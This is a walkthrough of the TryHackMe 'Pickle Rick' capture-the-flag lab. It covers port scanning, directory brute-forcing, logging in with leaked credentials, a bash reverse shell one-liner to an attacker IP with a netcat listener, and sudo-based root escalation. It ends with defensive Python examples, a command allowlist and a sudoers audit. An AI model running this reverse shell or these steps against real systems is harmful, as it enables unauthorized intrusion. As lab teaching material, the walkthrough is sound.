Pickle Rick TryHackMe Walkthrough

Today we are going to solve another challenge called Pickle Rick. It is available at TryHackMe for penetration testing practice. The challenge is of easy difficulty if you have the right basic knowledge and are attentive to the small details that are required in the enumeration process. The credit for making this machine goes to tryhackme. The breakdown of the machine with the redacted flags is:

Level: Easy

Penetration Testing Methodology

Network Scanning

Nmap Scan

Enumeration

Enumerating HTTP Service

Extracting Username from Source Code

Directory Bruteforce using dirb

Extracting Password from robots.txt

Directory Bruteforce using dirb [Extension]

Logging into the Web Application

Exploiting Command Module

Enumerating for Ingredients

Invoking Reverse Shell

Extracting the First Ingredient

Identifying Rick's Files

Extracting the Second Ingredient

Privilege Escalation

Identifying Sudo Permissions

Exploiting Sudo Permissions

Getting Root Shell

Extracting the Third Ingredient

Walkthrough 

After booting up the target machine from the TryHackMe: Pickle Rick CTF page, an IP address will be assigned to the machine and will be visible on that page as well.

IP Address: 10.10.43.98

Three questions are required to complete this machine.

Network Scanning

We will start with an Nmap scan with -sC for default scripts and -sV for version scanning.

nmap -sC -sV 10.10.43.98

Nmap was able to identify 2 services running on the target machine: SSH (22) and HTTP (80).

Enumeration

Since we don't have credentials for the SSH service, we will start the enumeration from the HTTP service. We see a simple Rick and Morty-themed web page. It shows a message from Rick to Morty. It tells Morty that Rick has turned himself into a pickle again. The twist is that he can't change back. He asks Morty to log in to his computer and extract 3 secret ingredients that are required for Rick to turn back into a human from a pickle. Since Rick has forgotten the password for his computer, Morty is required to use his hacking skills to get those ingredients.

http://10.10.43.98/ 

We look for any clues inside the page itself. We check the source code and find the username R1ckRul3s.

view-source:http://10.10.43.98/ 

There are two possibilities here: either this is a username that can be used to log in through SSH, or there is another login module inside the web application. To explore the second possibility, we ran a directory bruteforce using dirb. We found the robots.txt file.

dirb http://10.10.43.98 

After reading robots.txt, we found Rick's catchphrase Wubbalubbadubdub. This might be the password for the user that we found earlier. Now we need to enumerate the login page, if there is one.

http://10.10.43.98/robots.txt 

Back to our directory bruteforce: this time we included the extension filter and checked for PHP files. After running for a while, it was able to find login.php. Possibly this is the portal that can be used to log in to the web application.

dirb http://10.10.43.98 -X .php

After opening login.php in the web browser, we see that it is the portal login. We use the username that we enumerated from the source code of the home page and the password that we found in robots.txt.

http://10.10.43.98/login.php 

R1ckRul3s 

Wubbalubbadubdub 

Exploitation

We were able to log in using the credentials. There were a number of other pages and options in the menu, but the Commands tab caught our attention. As expected, it was a panel that can be used to run system commands on the target machine. We ran the ls command and found a text file named Sup3rS3cretPickl3Ingred.txt.

We tried reading the Sup3rS3cretPickl3Ingred.txt file using the cat command, but we were blocked by Mr. Meeseeks, who says that the cat command is restricted.

This is when we decided to open a reverse shell by entering a reverse shell one-liner into the command panel.

bash -c 'bash -i >& /dev/tcp/10.10.210.158/8080 0>&1'

We started a Netcat listener before executing the reverse shell command on the web application.

Once the execution went through, we had a reverse shell on the target machine.

Now there is no restriction preventing us from reading the Sup3rS3cretPickl3Ingred.txt file. We see that it contains one of the three ingredients.

nc -lvp 8080

ls

cat Sup3rS3cretPickl3Ingred.txt
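Why the panel's filter did not hold, and what a fix looks like, as an added example that is not from the original walkthrough or the target application. The denylist logic and the action names are assumptions; the three inputs are the commands used above.

```python
import shlex
import subprocess

# Assumed model of the panel's filter: refuse input that names a denied program.
DENYLIST = {"cat"}

# Hardened design: the user picks an action name, never a command line.
# Action names and argv lists are hypothetical.
ALLOWED_ACTIONS = {
    "list-webroot": ["ls", "-l", "/var/www/html"],
    "disk-usage": ["df", "-h"],
}

# Inputs taken from the walkthrough above.
PAGE_COMMANDS = [
    "ls",
    "cat Sup3rS3cretPickl3Ingred.txt",
    "bash -c 'bash -i >& /dev/tcp/10.10.210.158/8080 0>&1'",
]


def denylist_allows(command):
    """True if no token names a denied program (the weak check)."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        return False
    return not any(tok.rsplit("/", 1)[-1] in DENYLIST for tok in tokens)


def run_action(action):
    """Run a fixed argv for a known action; anything else is refused."""
    argv = ALLOWED_ACTIONS.get(action)
    if argv is None:
        return (False, "unknown action")
    # No shell is involved, so quoting and redirection have no meaning here.
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return (proc.returncode == 0, proc.stdout)


def compare(inputs):
    """For each input: (input, passes denylist, accepted by allowlist)."""
    return [(s, denylist_allows(s), s in ALLOWED_ACTIONS) for s in inputs]


if __name__ == "__main__":
    for row in compare(PAGE_COMMANDS):
        print(row)
```

The denylist passes the bash line because nothing in it is named cat, while the allowlist accepts none of the three inputs as typed.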

The session that we have obtained is for the user www-data.

We enumerate the users on the machine and find the user rick.

We moved into the home directory of the rick user to find the second ingredient.

cd /home

ls

cd rick

ls

cat 'second ingredients'

Privilege Escalation

Now we need to elevate privileges on this machine to proceed. We check the sudo permissions for the www-data user.

We see that it can run all commands as root. We use the sudo command with bash to get the root shell. We were able to get the root shell on the machine.

We then proceeded to read the third ingredient and finish the machine.
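An audit for the sudo misconfiguration used above, as an added example that is not part of the original walkthrough: it flags service accounts that may run every command as root. The sudoers sample is constructed, and the service-account list is an assumption to adjust per host.

```python
import re

# Accounts that run network-facing services (assumed list, adjust per host).
SERVICE_ACCOUNTS = {"www-data", "nginx", "apache", "mysql", "postgres", "nobody"}
SKIP = ("#", "@", "Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)

# Constructed sample policy, not copied from the target machine.
SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
"""


def parse_rules(text):
    """Parse simple user rules; aliases and include files are not expanded."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(SKIP):
            continue
        m = RULE.match(line)
        if m is None:
            continue
        rest = m["rest"]
        rules.append({
            "who": m["who"],
            # With no Runas spec, sudo runs the command as root.
            "runas": (m["runas"] or "root").split(":")[0],
            "tags": set(re.findall(r"([A-Z_]+):", rest)),
            "cmds": [c.strip() for c in re.sub(r"[A-Z_]+:\s*", "", rest).split(",")],
        })
    return rules


def audit(text):
    """Return (account, passwordless) for service accounts granted ALL as root."""
    findings = []
    for rule in parse_rules(text):
        runas = {u.strip() for u in rule["runas"].split(",")}
        if (rule["who"] in SERVICE_ACCOUNTS and runas & {"ALL", "root"}
                and "ALL" in rule["cmds"]):
            findings.append((rule["who"], "NOPASSWD" in rule["tags"]))
    return findings
```

Running `audit(SAMPLE_SUDOERS)` reports www-data as a passwordless finding and ignores the backup rule, which is limited to a single program.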


